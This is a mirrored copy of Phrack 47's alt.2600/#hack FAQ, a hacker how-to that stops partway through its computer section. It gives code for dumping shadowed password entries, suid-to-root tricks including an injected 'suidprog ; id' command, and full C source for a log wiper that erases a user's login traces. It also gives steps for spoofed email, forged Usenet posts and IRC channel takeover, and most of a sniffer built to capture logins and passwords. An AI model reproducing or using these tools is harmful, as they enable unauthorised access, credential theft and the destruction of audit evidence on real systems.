mirror of
https://github.com/fdiskyou/Zines.git
synced 2025-03-09 00:00:00 +01:00
1292 lines
37 KiB
Text
1292 lines
37 KiB
Text
==Phrack Magazine==
|
|
|
|
Volume Six, Issue Forty-Seven, File 5 of 22
|
|
|
|
|
|
|
|
Editors Note: Welcome to special release of the alt.2600/#hack FAQ for
|
|
Phrack Magazine!
|
|
|
|
The purpose of this FAQ is to give you a general
|
|
introduction to the topics covered on alt.2600 and
|
|
#hack. No document will make you a hacker.
|
|
|
|
If you have a question regarding any of the topics
|
|
covered in the FAQ, please direct it to alt.2600 or
|
|
#hack. Please do not e-mail me with them, I'm getting
|
|
swamped.
|
|
|
|
If your copy of the alt.2600/#hack FAQ does not end with
|
|
the letters EOT on a line by themselves, you do not have
|
|
the entire FAQ.
|
|
|
|
|
|
The
|
|
|
|
alt.2600/#Hack F.A.Q.
|
|
|
|
Special release for Phrack Magazine
|
|
|
|
A TNO Communication Production
|
|
|
|
by
|
|
|
|
Voyager
|
|
will@gnu.ai.mit.edu
|
|
|
|
Sysop of
|
|
Hacker's Haven
|
|
(303)343-4053
|
|
|
|
With greets going out to:
|
|
|
|
A-Flat, Al, Aleph1, Bluesman, Cavalier, C-Curve, DeadKat,
|
|
Disorder, Edison, Erik Bloodaxe, Hobbit, KCrow, Major,
|
|
Marauder, Novocain, Outsider, Presence, Rogue Agent, sbin,
|
|
Taran King, Theora, ThePublic, Tomes and TheSaint.
|
|
|
|
|
|
We work in the dark
|
|
We do what we can
|
|
We give what we have
|
|
Our doubt is our passion,
|
|
and our passion is our task
|
|
The rest is the madness of art.
|
|
|
|
-- Henry James
|
|
|
|
|
|
|
|
Section A: Computers
|
|
|
|
01. How do I access the password file under Unix?
|
|
02. How do I crack Unix passwords?
|
|
03. What is password shadowing?
|
|
04. Where can I find the password file if it's shadowed?
|
|
05. What is NIS/yp?
|
|
06. What are those weird characters after the comma in my passwd file?
|
|
07. How do I access the password file under VMS?
|
|
08. How do I crack VMS passwords?
|
|
09. How do I break out of a restricted shell?
|
|
10. How do I gain root from a suid script or program?
|
|
11. How do I erase my presence from the system logs?
|
|
12. How do I send fakemail?
|
|
13. How do I fake posts to UseNet?
|
|
14. How do I hack ChanOp on IRC?
|
|
15. How do I modify the IRC client to hide my real username?
|
|
16. How to I change to directories with strange characters in them?
|
|
17. What is ethernet sniffing?
|
|
18. What is an Internet Outdial?
|
|
19. What are some Internet Outdials?
|
|
20. What is this system?
|
|
21. What are the default accounts for XXX ?
|
|
22. What port is XXX on?
|
|
23. What is a trojan/worm/virus/logic bomb?
|
|
24. How can I protect myself from viruses and such?
|
|
25. Where can I get more information about viruses?
|
|
26. What is Cryptoxxxxxxx?
|
|
27. What is PGP?
|
|
28. What is Tempest?
|
|
29. What is an anonymous remailer?
|
|
30. What are the addresses of some anonymous remailers?
|
|
31. How do I defeat copy protection?
|
|
32. What is 127.0.0.1?
|
|
33. How do I post to a moderated newsgroup?
|
|
|
|
|
|
Section B: Telephony
|
|
|
|
01. What is a Red Box?
|
|
02. How do I build a Red Box?
|
|
03. Where can I get a 6.5536Mhz crystal?
|
|
04. Which payphones will a Red Box work on?
|
|
05. How do I make local calls with a Red Box?
|
|
06. What is a Blue Box?
|
|
07. Do Blue Boxes still work?
|
|
08. What is a Black Box?
|
|
09. What do all the colored boxes do?
|
|
10. What is an ANAC number?
|
|
11. What is the ANAC number for my area?
|
|
12. What is a ringback number?
|
|
13. What is the ringback number for my area?
|
|
14. What is a loop?
|
|
15. What is a loop in my area?
|
|
16. What is a CNA number?
|
|
17. What is the telephone company CNA number for my area?
|
|
18. What are some numbers that always ring busy?
|
|
19. What are some numbers that temporarily disconnect phone service?
|
|
20. What is scanning?
|
|
21. Is scanning illegal?
|
|
22. Where can I purchase a lineman's handset?
|
|
23. What are the DTMF frequencies?
|
|
24. What are the frequencies of the telephone tones?
|
|
25. What are all of the * (LASS) codes?
|
|
26. What frequencies do cordless phones operate on?
|
|
27. What is Caller-ID?
|
|
28. What is a PBX?
|
|
29. What is a VMB?
|
|
|
|
|
|
Section C: Resources
|
|
|
|
01. What are some ftp sites of interest to hackers?
|
|
02. What are some fsp sites of interest to hackers?
|
|
03. What are some newsgroups of interest to hackers?
|
|
04. What are some telnet sites of interest to hackers?
|
|
05. What are some gopher sites of interest to hackers?
|
|
06. What are some World wide Web (WWW) sites of interest to hackers?
|
|
07. What are some IRC channels of interest to hackers?
|
|
08. What are some BBS's of interest to hackers?
|
|
09. What are some books of interest to hackers?
|
|
10. What are some videos of interest to hackers?
|
|
11. What are some mailing lists of interest to hackers?
|
|
12. What are some print magazines of interest to hackers?
|
|
13. What are some e-zines of interest to hackers?
|
|
14. What are some organizations of interest to hackers?
|
|
15. Where can I purchase a magnetic stripe encoder/decoder?
|
|
16. What are the rainbow books and how can I get them?
|
|
|
|
|
|
Section D: 2600
|
|
|
|
01. What is alt.2600?
|
|
02. What does "2600" mean?
|
|
03. Are there on-line versions of 2600 available?
|
|
04. I can't find 2600 at any bookstores. What can I do?
|
|
05. Why does 2600 cost more to subscribe to than to buy at a newsstand?
|
|
|
|
|
|
Section E: Phrack Magazine
|
|
|
|
01. What is Phrack Magazine?
|
|
02. How can I reach Phrack Magazine?
|
|
03. Who Publishes Phrack?
|
|
04. How often does Phrack go out?
|
|
05. How do I subscribe?
|
|
06. Why don't I get any response when I email Phrack?
|
|
07. Does Phrack cost money?
|
|
08. How can I submit articles?
|
|
09. What is Phrack's PGP key?
|
|
10. Where can I get back issues?
|
|
|
|
|
|
Section F: Miscellaneous
|
|
|
|
01. What does XXX stand for?
|
|
02. How do I determine if I have a valid credit card number?
|
|
03. What bank issued this credit card?
|
|
04. What are the ethics of hacking?
|
|
05. Where can I get a copy of the alt.2600/#hack FAQ?
|
|
|
|
|
|
Section A: Computers
|
|
~~~~~~~~~~~~~~~~~~~~
|
|
|
|
01. How do I access the password file under Unix?
|
|
|
|
In standard Unix the password file is /etc/passwd. On a Unix system
|
|
with either NIS/yp or password shadowing, much of the password data
|
|
may be elsewhere.
|
|
|
|
|
|
02. How do I crack Unix passwords?
|
|
|
|
Contrary to popular belief, Unix passwords cannot be decrypted. Unix
|
|
passwords are encrypted with a one way function. The login program
|
|
encrypts the text you enter at the "password:" prompt and compares
|
|
that encrypted string against the encrypted form of your password.
|
|
|
|
Password cracking software uses wordlists. Each word in the wordlist
|
|
is encrypted and the results are compared to the encrypted form of the
|
|
target password.
|
|
|
|
The best cracking program for Unix passwords is currently Crack by
|
|
Alec Muffett. For PC-DOS, the best package to use is currently
|
|
CrackerJack.
|
|
|
|
|
|
03. What is password shadowing?
|
|
|
|
Password shadowing is a security system where the encrypted password
|
|
field of /etc/passwd is replaced with a special token and the
|
|
encrypted password is stored in a separate file which is not readable
|
|
by normal system users.
|
|
|
|
To defeat password shadowing on many (but not all) systems, write a
|
|
program that uses successive calls to getpwent() to obtain the
|
|
password file.
|
|
|
|
Example:
|
|
|
|
#include <pwd.h>
|
|
main()
|
|
{
|
|
struct passwd *p;
|
|
while(p=getpwent())
|
|
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
|
|
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
|
|
}
|
|
|
|
|
|
04. Where can I find the password file if it's shadowed?
|
|
|
|
Unix Path Token
|
|
-----------------------------------------------------------------
|
|
AIX 3 /etc/security/passwd !
|
|
or /tcb/auth/files/<first letter #
|
|
of username>/<username>
|
|
A/UX 3.0s /tcb/files/auth/?/*
|
|
BSD4.3-Reno /etc/master.passwd *
|
|
ConvexOS 10 /etc/shadpw *
|
|
ConvexOS 11 /etc/shadow *
|
|
DG/UX /etc/tcb/aa/user/ *
|
|
EP/IX /etc/shadow x
|
|
HP-UX /.secure/etc/passwd *
|
|
IRIX 5 /etc/shadow x
|
|
Linux 1.1 /etc/shadow *
|
|
OSF/1 /etc/passwd[.dir|.pag] *
|
|
SCO Unix #.2.x /tcb/auth/files/<first letter *
|
|
of username>/<username>
|
|
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
|
|
SunOS 5.0 /etc/shadow
|
|
<optional NIS+ private secure maps/tables/whatever>
|
|
System V Release 4.0 /etc/shadow x
|
|
System V Release 4.2 /etc/security/* database
|
|
Ultrix 4 /etc/auth[.dir|.pag] *
|
|
UNICOS /etc/udb *
|
|
|
|
|
|
05. What is NIS/yp?
|
|
|
|
NIS (Network Information System) in the current name for what was once
|
|
known as yp (Yellow Pages). The purpose for NIS is to allow many
|
|
machines on a network to share configuration information, including
|
|
password data. NIS is not designed to promote system security. If
|
|
your system uses NIS you will have a very short /etc/passwd file that
|
|
includes a line that looks like this:
|
|
|
|
+::0:0:::
|
|
|
|
To view the real password file use this command "ypcat passwd"
|
|
|
|
|
|
06. What are those weird characters after the comma in my passwd file?
|
|
|
|
The characters are password aging data. Password aging forces the
|
|
user to change passwords after a System Administrator specified period
|
|
of time. Password aging can also force a user to keep a password for
|
|
a certain number of weeks before changing it.
|
|
|
|
]
|
|
] Sample entry from /etc/passwd with password aging installed:
|
|
]
|
|
] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash
|
|
]
|
|
|
|
Note the comma in the encrypted password field. The characters after
|
|
the comma are used by the password aging mechanism.
|
|
|
|
]
|
|
] Password aging characters from above example:
|
|
]
|
|
] M.z8
|
|
]
|
|
|
|
The four characters are interpreted as follows:
|
|
|
|
1: Maximum number of weeks a password can be used without changing.
|
|
2: Minimum number of weeks a password must be used before changing.
|
|
3&4: Last time password was changed, in number of weeks since 1970.
|
|
|
|
Three special cases should be noted:
|
|
|
|
If the first and second characters are set to '..' the user will be
|
|
forced to change his/her passwd the next time he/she logs in. The
|
|
passwd program will then remove the passwd aging characters, and the
|
|
user will not be subjected to password aging requirements again.
|
|
|
|
If the third and fourth characters are set to '..' the user will be
|
|
forced to change his/her passwd the next time he/she logs in. Password
|
|
aging will then occur as defined by the first and second characters.
|
|
|
|
If the first character (MAX) is less than the second character (MIN),
|
|
the user is not allowed to change his/her password. Only root can
|
|
change that users password.
|
|
|
|
It should also be noted that the su command does not check the password
|
|
aging data. An account with an expired password can be su'd to
|
|
without being forced to change the password.
|
|
|
|
|
|
Password Aging Codes
|
|
+------------------------------------------------------------------------+
|
|
| |
|
|
| Character: . / 0 1 2 3 4 5 6 7 8 9 A B C D E F G H |
|
|
| Number: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
|
|
| |
|
|
| Character: I J K L M N O P Q R S T U V W X Y Z a b |
|
|
| Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
|
|
| |
|
|
| Character: c d e f g h i j k l m n o p q r s t u v |
|
|
| Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
|
|
| |
|
|
| Character: w x y z |
|
|
| Number: 60 61 62 63 |
|
|
| |
|
|
+------------------------------------------------------------------------+
|
|
|
|
|
|
07. How do I access the password file under VMS?
|
|
|
|
Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT. However,
|
|
unlike Unix, most users do not have access to read the password file.
|
|
|
|
|
|
08. How do I crack VMS passwords?
|
|
|
|
Write a program that uses the SYS$GETUAF functions to compare the
|
|
results of encrypted words against the encrypted data in SYSUAF.DAT.
|
|
|
|
Two such programs are known to exist, CHECK_PASSWORD and
|
|
GUESS_PASSWORD.
|
|
|
|
|
|
09. How do I break out of a restricted shell?
|
|
|
|
On poorly implemented restricted shells you can break out of the
|
|
restricted environment by running a program that features a shell
|
|
function. A good example is vi. Run vi and use this command:
|
|
|
|
:set shell=/bin/sh
|
|
|
|
then shell using this command:
|
|
|
|
:shell
|
|
|
|
|
|
10. How do I gain root from a suid script or program?
|
|
|
|
1. Change IFS.
|
|
|
|
If the program calls any other programs using the system() function
|
|
call, you may be able to fool it by changing IFS. IFS is the Internal
|
|
Field Separator that the shell uses to delimit arguments.
|
|
|
|
If the program contains a line that looks like this:
|
|
|
|
system("/bin/date")
|
|
|
|
and you change IFS to '/' the shell will them interpret the
|
|
proceeding line as:
|
|
|
|
bin date
|
|
|
|
Now, if you have a program of your own in the path called "bin" the
|
|
suid program will run your program instead of /bin/date.
|
|
|
|
To change IFS, use this command:
|
|
|
|
IFS='/';export IFS # Bourne Shell
|
|
setenv IFS '/' # C Shell
|
|
export IFS='/' # Korn Shell
|
|
|
|
|
|
2. link the script to -i
|
|
|
|
Create a symbolic link named "-i" to the program. Running "-i"
|
|
will cause the interpreter shell (/bin/sh) to start up in interactive
|
|
mode. This only works on suid shell scripts.
|
|
|
|
Example:
|
|
|
|
% ln suid.sh -i
|
|
% -i
|
|
#
|
|
|
|
|
|
3. Exploit a race condition
|
|
|
|
Replace a symbolic link to the program with another program while the
|
|
kernel is loading /bin/sh.
|
|
|
|
Example:
|
|
|
|
nice -19 suidprog ; ln -s evilprog suidroot
|
|
|
|
|
|
4. Send bad input to the program.
|
|
|
|
Invoke the name of the program and a separate command on the same
|
|
command line.
|
|
|
|
Example:
|
|
|
|
suidprog ; id
|
|
|
|
|
|
11. How do I erase my presence from the system logs?
|
|
|
|
Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
|
|
files that can be edited by hand with vi, you must use a program
|
|
specifically written for this purpose.
|
|
|
|
Example:
|
|
|
|
#include <sys/types.h>
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
#include <sys/file.h>
|
|
#include <fcntl.h>
|
|
#include <utmp.h>
|
|
#include <pwd.h>
|
|
#include <lastlog.h>
|
|
#define WTMP_NAME "/usr/adm/wtmp"
|
|
#define UTMP_NAME "/etc/utmp"
|
|
#define LASTLOG_NAME "/usr/adm/lastlog"
|
|
|
|
int f;
|
|
|
|
void kill_utmp(who)
|
|
char *who;
|
|
{
|
|
struct utmp utmp_ent;
|
|
|
|
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
|
|
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
|
|
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
|
|
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
|
|
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
|
|
write (f, &utmp_ent, sizeof (utmp_ent));
|
|
}
|
|
close(f);
|
|
}
|
|
}
|
|
|
|
void kill_wtmp(who)
|
|
char *who;
|
|
{
|
|
struct utmp utmp_ent;
|
|
long pos;
|
|
|
|
pos = 1L;
|
|
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
|
|
|
|
while(pos != -1L) {
|
|
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
|
|
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
|
|
pos = -1L;
|
|
} else {
|
|
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
|
|
bzero((char *)&utmp_ent,sizeof(struct utmp ));
|
|
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
|
|
write (f, &utmp_ent, sizeof (utmp_ent));
|
|
pos = -1L;
|
|
} else pos += 1L;
|
|
}
|
|
}
|
|
close(f);
|
|
}
|
|
}
|
|
|
|
void kill_lastlog(who)
|
|
char *who;
|
|
{
|
|
struct passwd *pwd;
|
|
struct lastlog newll;
|
|
|
|
if ((pwd=getpwnam(who))!=NULL) {
|
|
|
|
if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
|
|
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
|
|
bzero((char *)&newll,sizeof( newll ));
|
|
write(f, (char *)&newll, sizeof( newll ));
|
|
close(f);
|
|
}
|
|
|
|
} else printf("%s: ?\n",who);
|
|
}
|
|
|
|
main(argc,argv)
|
|
int argc;
|
|
char *argv[];
|
|
{
|
|
if (argc==2) {
|
|
kill_lastlog(argv[1]);
|
|
kill_wtmp(argv[1]);
|
|
kill_utmp(argv[1]);
|
|
printf("Zap2!\n");
|
|
} else
|
|
printf("Error.\n");
|
|
}
|
|
|
|
|
|
12. How do I send fakemail?
|
|
|
|
Telnet to port 25 of the machine you want the mail to appear to
|
|
originate from. Enter your message as in this example:
|
|
|
|
HELO bellcore.com
|
|
MAIL FROM:Voyager@bellcore.com
|
|
RCPT TO:president@whitehouse.gov
|
|
DATA
|
|
|
|
Please discontinue your silly Clipper initiative.
|
|
.
|
|
QUIT
|
|
|
|
On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
|
|
line will not work. Test by sending yourself fakemail first.
|
|
|
|
For more information read RFC 822 "Standard for the format of ARPA
|
|
Internet text messages."
|
|
|
|
|
|
13. How do I fake posts to UseNet?
|
|
|
|
Use inews to post. Give inews the following lines:
|
|
|
|
From:
|
|
Newsgroups:
|
|
Subject:
|
|
Message-ID:
|
|
Date:
|
|
Organization:
|
|
|
|
For a moderated newsgroup, inews will also require this line:
|
|
|
|
Approved:
|
|
|
|
Then add your post and terminate with <Control-D>.
|
|
|
|
Example:
|
|
|
|
From: Eric S. Real
|
|
Newsgroups: alt.hackers
|
|
Subject: Pathetic bunch of wannabe losers
|
|
Message-ID: <esr.123@locke.ccil.org>
|
|
Date: Fri, 13 Aug 1994 12:15:03
|
|
Organization: Moral Majority
|
|
|
|
A pathetic bunch of wannabe losers is what most of you are, with no
|
|
right to steal the honorable title of `hacker' to puff up your silly
|
|
adolescent egos. Get stuffed, get lost, and go to jail.
|
|
|
|
Eric S. Real <esr@locke.ccil.org>
|
|
|
|
|
|
^D
|
|
|
|
Note that many systems will append an Originator: line to your message
|
|
header, effectively revealing the account from which the message was
|
|
posted.
|
|
|
|
|
|
14. How do I hack ChanOp on IRC?
|
|
|
|
Find a server that is split from the rest of IRC and create your own
|
|
channel there using the name of the channel you want ChanOp on. When
|
|
that server reconnects to the net, you will have ChanOp on the real
|
|
channel. If you have ServerOp on a server, you can cause it to split
|
|
on purpose.
|
|
|
|
|
|
15. How do I modify the IRC client to hide my real username?
|
|
|
|
Get the IRC client from cs.bu.edu /irc/clients. Look at the source
|
|
code files irc.c and ctcp.c. The code you are looking for is fairly
|
|
easy to spot. Change it. Change the username code in irc.c and the
|
|
ctcp information code in ctcp.c. Compile and run your client.
|
|
|
|
Here are the diffs from a sample hack of the IRC client. Your client
|
|
code will vary slightly depending on what IRC client version you are
|
|
running.
|
|
|
|
*** ctcp.c.old Wed Feb 10 10:08:05 1993
|
|
--- ctcp.c Fri Feb 12 04:33:55 1993
|
|
***************
|
|
*** 331,337 ****
|
|
struct passwd *pwd;
|
|
long diff;
|
|
int uid;
|
|
! char c;
|
|
|
|
/*
|
|
* sojge complained that ircII says 'idle 1 seconds'
|
|
--- 331,337 ----
|
|
struct passwd *pwd;
|
|
long diff;
|
|
int uid;
|
|
! char c, *fing;
|
|
|
|
/*
|
|
* sojge complained that ircII says 'idle 1 seconds'
|
|
***************
|
|
*** 348,354 ****
|
|
if (uid != DAEMON_UID)
|
|
{
|
|
#endif /* DAEMON_UID */
|
|
! if (pwd = getpwuid(uid))
|
|
{
|
|
char *tmp;
|
|
|
|
--- 348,356 ----
|
|
if (uid != DAEMON_UID)
|
|
{
|
|
#endif /* DAEMON_UID */
|
|
! if (fing = getenv("IRCFINGER"))
|
|
! send_ctcp_reply(from, ctcp->name, fing, diff, c);
|
|
! else if (pwd = getpwuid(uid))
|
|
{
|
|
char *tmp;
|
|
|
|
*** irc.c.old Wed Feb 10 06:33:11 1993
|
|
--- irc.c Fri Feb 12 04:02:11 1993
|
|
***************
|
|
*** 510,516 ****
|
|
malloc_strcpy(&my_path, "/");
|
|
if (*realname == null(char))
|
|
strmcpy(realname, "*Unknown*", REALNAME_LEN);
|
|
! if (*username == null(char))
|
|
{
|
|
if (ptr = getenv("USER"))
|
|
strmcpy(username, ptr, NAME_LEN);
|
|
--- 510,518 ----
|
|
malloc_strcpy(&my_path, "/");
|
|
if (*realname == null(char))
|
|
strmcpy(realname, "*Unknown*", REALNAME_LEN);
|
|
! if (ptr = getenv("IRCUSER"))
|
|
! strmcpy(username, ptr, NAME_LEN);
|
|
! else if (*username == null(char))
|
|
{
|
|
if (ptr = getenv("USER"))
|
|
strmcpy(username, ptr, NAME_LEN);
|
|
|
|
|
|
16. How to I change to directories with strange characters in them?
|
|
|
|
These directories are often used by people trying to hide information,
|
|
most often warez (commercial software).
|
|
|
|
There are several things you can do to determine what these strange
|
|
characters are. One is to use the arguments to the ls command that
|
|
cause ls to give you more information:
|
|
|
|
From the man page for ls:
|
|
|
|
-F Causes directories to be marked with a trailing ``/'',
|
|
executable files to be marked with a trailing ``*'', and
|
|
symbolic links to be marked with a trailing ``@'' symbol.
|
|
|
|
-q Forces printing of non-graphic characters in filenames as the
|
|
character ``?''.
|
|
|
|
-b Forces printing of non-graphic characters in the \ddd
|
|
notation, in octal.
|
|
|
|
Perhaps the most useful tool is to simply do an "ls -al filename" to
|
|
save the directory of the remote ftp site as a file on your local
|
|
machine. Then you can do a "cat -t -v -e filename" to see exactly
|
|
what those bizarre little characters are.
|
|
|
|
From the man page for cat:
|
|
|
|
-v Causes non-printing characters (with the exception of tabs,
|
|
newlines, and form feeds) to be displayed. Control characters
|
|
are displayed as ^X (<Ctrl>x), where X is the key pressed with
|
|
the <Ctrl> key (for example, <Ctrl>m is displayed as ^M). The
|
|
<Del> character (octal 0177) is printed as ^?. Non-ASCII
|
|
characters (with the high bit set) are printed as M -x, where
|
|
x is the character specified by the seven low order bits.
|
|
|
|
-t Causes tabs to be printed as ^I and form feeds as ^L. This
|
|
option is ignored if the -v option is not specified.
|
|
|
|
-e Causes a ``$'' character to be printed at the end of each line
|
|
(prior to the new-line). This option is ignored if the -v
|
|
option is not set.
|
|
|
|
If the directory name includes a <SPACE> or a <TAB> you will need to
|
|
enclose the entire directory name in quotes. Example:
|
|
|
|
cd "..<TAB>"
|
|
|
|
On an IBM-PC, you may enter these special characters by holding down
|
|
the <ALT> key and entering the decimal value of the special character
|
|
on your numeric keypad. When you release the <ALT> key, the special
|
|
character should appear on your screen. An ASCII chart can be very
|
|
helpful.
|
|
|
|
Sometimes people will create directories with some of the standard
|
|
stty control characters in them, such as ^Z (suspend) or ^C (intr).
|
|
To get into those directories, you will first need to user stty to
|
|
change the control character in qustion to another character.
|
|
|
|
From the man page for stty:
|
|
|
|
Control assignments
|
|
|
|
control-character C
|
|
Sets control-character to C, where control-character is
|
|
erase, kill, intr (interrupt), quit, eof, eol, swtch
|
|
(switch), start, stop or susp.
|
|
|
|
start and stop are available as possible control char-
|
|
acters for the control-character C assignment.
|
|
|
|
If C is preceded by a caret (^) (escaped from the
|
|
shell), then the value used is the corresponding con-
|
|
trol character (for example, ^D is a <Ctrl>d; ^? is
|
|
interpreted as DELETE and ^- is interpreted as unde-
|
|
fined).
|
|
|
|
Use the stty -a command to see your current stty settings, and to
|
|
determine which one is causing you problems.
|
|
|
|
|
|
17. What is ethernet sniffing?
|
|
|
|
Ethernet sniffing is listening (with software) to the raw ethernet
|
|
device for packets that interest you. When your software sees a
|
|
packet that fits certain criteria, it logs it to a file. The most
|
|
common criteria for an interesting packet is one that contains words
|
|
like "login" or "password."
|
|
|
|
Many ethernet sniffers are available, here are a few that may be on
|
|
your system now:
|
|
|
|
OS Sniffer
|
|
~~ ~~~~~~~
|
|
HP/UX nettl (monitor) & netfmt (display)
|
|
nfswatch /* Available via anonymous ftp */
|
|
Irix nfswatch /* Available via anonymous ftp */
|
|
Etherman
|
|
SunOS etherfind
|
|
nfswatch /* Available via anonymous ftp */
|
|
Solaris snoop
|
|
DOS ETHLOAD /* Available via anonymous ftp as */
|
|
/* ethld104.zip */
|
|
The Gobbler /* Available via anonymous ftp */
|
|
LanPatrol
|
|
LanWatch
|
|
Netmon
|
|
Netwatch
|
|
Netzhack /* Available via anonymous ftp at */
|
|
/* mistress.informatik.unibw-muenchen.de */
|
|
/* /pub/netzhack.mac */
|
|
Macintosh Etherpeek
|
|
|
|
Here is source code for an ethernet sniffer:
|
|
|
|
/* Esniff.c */
|
|
|
|
#include <stdio.h>
|
|
#include <ctype.h>
|
|
#include <string.h>
|
|
|
|
#include <sys/time.h>
|
|
#include <sys/file.h>
|
|
#include <sys/stropts.h>
|
|
#include <sys/signal.h>
|
|
#include <sys/types.h>
|
|
#include <sys/socket.h>
|
|
#include <sys/ioctl.h>
|
|
|
|
#include <net/if.h>
|
|
#include <net/nit_if.h>
|
|
#include <net/nit_buf.h>
|
|
#include <net/if_arp.h>
|
|
|
|
#include <netinet/in.h>
|
|
#include <netinet/if_ether.h>
|
|
#include <netinet/in_systm.h>
|
|
#include <netinet/ip.h>
|
|
#include <netinet/udp.h>
|
|
#include <netinet/ip_var.h>
|
|
#include <netinet/udp_var.h>
|
|
#include <netinet/in_systm.h>
|
|
#include <netinet/tcp.h>
|
|
#include <netinet/ip_icmp.h>
|
|
|
|
#include <netdb.h>
|
|
#include <arpa/inet.h>
|
|
|
|
#define ERR stderr
|
|
|
|
char *malloc();
|
|
char *device,
|
|
*ProgName,
|
|
*LogName;
|
|
FILE *LOG;
|
|
int debug=0;
|
|
|
|
#define NIT_DEV "/dev/nit"
|
|
#define CHUNKSIZE 4096 /* device buffer size */
|
|
int if_fd = -1;
|
|
int Packet[CHUNKSIZE+32];
|
|
|
|
void Pexit(err,msg)
|
|
int err; char *msg;
|
|
{ perror(msg);
|
|
exit(err); }
|
|
|
|
void Zexit(err,msg)
|
|
int err; char *msg;
|
|
{ fprintf(ERR,msg);
|
|
exit(err); }
|
|
|
|
#define IP ((struct ip *)Packet)
|
|
#define IP_OFFSET (0x1FFF)
|
|
#define SZETH (sizeof(struct ether_header))
|
|
#define IPLEN (ntohs(ip->ip_len))
|
|
#define IPHLEN (ip->ip_hl)
|
|
#define TCPOFF (tcph->th_off)
|
|
#define IPS (ip->ip_src)
|
|
#define IPD (ip->ip_dst)
|
|
#define TCPS (tcph->th_sport)
|
|
#define TCPD (tcph->th_dport)
|
|
#define IPeq(s,t) ((s).s_addr == (t).s_addr)
|
|
|
|
#define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))
|
|
|
|
#define MAXBUFLEN (128)
|
|
time_t LastTIME = 0;
|
|
|
|
struct CREC {
|
|
struct CREC *Next,
|
|
*Last;
|
|
time_t Time; /* start time */
|
|
struct in_addr SRCip,
|
|
DSTip;
|
|
u_int SRCport, /* src/dst ports */
|
|
DSTport;
|
|
u_char Data[MAXBUFLEN+2]; /* important stuff :-) */
|
|
u_int Length; /* current data length */
|
|
u_int PKcnt; /* # pkts */
|
|
u_long LASTseq;
|
|
};
|
|
|
|
struct CREC *CLroot = NULL;
|
|
|
|
char *Symaddr(ip)
|
|
register struct in_addr ip;
|
|
{ register struct hostent *he =
|
|
gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);
|
|
|
|
return( (he)?(he->h_name):(inet_ntoa(ip)) );
|
|
}
|
|
|
|
char *TCPflags(flgs)
|
|
register u_char flgs;
|
|
{ static char iobuf[8];
|
|
#define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
|
|
|
|
SFL(0,TH_FIN, 'F');
|
|
SFL(1,TH_SYN, 'S');
|
|
SFL(2,TH_RST, 'R');
|
|
SFL(3,TH_PUSH,'P');
|
|
SFL(4,TH_ACK, 'A');
|
|
SFL(5,TH_URG, 'U');
|
|
iobuf[6]=0;
|
|
return(iobuf);
|
|
}
|
|
|
|
char *SERVp(port)
|
|
register u_int port;
|
|
{ static char buf[10];
|
|
register char *p;
|
|
|
|
switch(port) {
|
|
case IPPORT_LOGINSERVER: p="rlogin"; break;
|
|
case IPPORT_TELNET: p="telnet"; break;
|
|
case IPPORT_SMTP: p="smtp"; break;
|
|
case IPPORT_FTP: p="ftp"; break;
|
|
default: sprintf(buf,"%u",port); p=buf; break;
|
|
}
|
|
return(p);
|
|
}
|
|
|
|
char *Ptm(t)
|
|
register time_t *t;
|
|
{ register char *p = ctime(t);
|
|
p[strlen(p)-6]=0; /* strip " YYYY\n" */
|
|
return(p);
|
|
}
|
|
|
|
char *NOWtm()
|
|
{ time_t tm;
|
|
time(&tm);
|
|
return( Ptm(&tm) );
|
|
}
|
|
|
|
#define MAX(a,b) (((a)>(b))?(a):(b))
|
|
#define MIN(a,b) (((a)<(b))?(a):(b))
|
|
|
|
/* add an item */
|
|
#define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
|
|
register struct CREC *CLtmp = \
|
|
(struct CREC *)malloc(sizeof(struct CREC)); \
|
|
time( &(CLtmp->Time) ); \
|
|
CLtmp->SRCip.s_addr = SIP.s_addr; \
|
|
CLtmp->DSTip.s_addr = DIP.s_addr; \
|
|
CLtmp->SRCport = SPORT; \
|
|
CLtmp->DSTport = DPORT; \
|
|
CLtmp->Length = MIN(LEN,MAXBUFLEN); \
|
|
bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
|
|
CLtmp->PKcnt = 1; \
|
|
CLtmp->Next = CLroot; \
|
|
CLtmp->Last = NULL; \
|
|
CLroot = CLtmp; \
|
|
}
|
|
|
|
register struct CREC *GET_NODE(Sip,SP,Dip,DP)
|
|
register struct in_addr Sip,Dip;
|
|
register u_int SP,DP;
|
|
{ register struct CREC *CLr = CLroot;
|
|
|
|
while(CLr != NULL) {
|
|
if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
|
|
IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
|
|
break;
|
|
CLr = CLr->Next;
|
|
}
|
|
return(CLr);
|
|
}
|
|
|
|
#define ADDDATA_NODE(CL,DATA,LEN) { \
|
|
bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
|
|
CL->Length += LEN; \
|
|
}
|
|
|
|
